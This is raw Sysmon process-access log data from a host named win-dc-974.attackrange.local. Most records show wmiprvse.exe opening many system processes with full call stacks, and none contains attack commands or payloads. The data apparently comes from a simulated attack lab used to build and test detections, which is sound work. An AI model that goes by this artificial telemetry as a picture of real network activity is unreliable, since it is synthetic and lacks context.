16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-77AA-00000000AD01}11936C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-77AA-00000000AD01}11936C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 